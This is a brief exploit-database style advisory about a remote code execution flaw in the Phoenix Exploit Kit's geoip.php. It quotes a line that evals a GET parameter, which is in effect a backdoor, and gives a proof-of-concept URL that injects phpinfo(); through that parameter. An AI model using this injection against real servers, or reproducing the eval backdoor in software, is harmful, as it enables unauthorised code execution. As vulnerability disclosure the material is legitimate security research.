Phoenix Exploit Kit suffers from a remote code execution vulnerability.
1f25ff92651bd8bb32029e3adf634acf5d0f7f6e4d481eafd322a6ba7c9eb2c9
# Exploit Title: Phoenix Exploit Kit - Remote Code Execution
# Exploit Author: CrashBandicot @DosPerl
# Date: 2016-06-30
# Tested on: MSWin32
# Vuln file : geoip.php
492. isset($_GET['bdr']) ? eval($_GET['bdr']) : explode('nop','nop nop nop');
# PoC : http://localhost/Phoenix/includes/geoip.php?bdr=phpinfo();
# Screen : http://i.imgur.com/E7RBBRk.png
__END__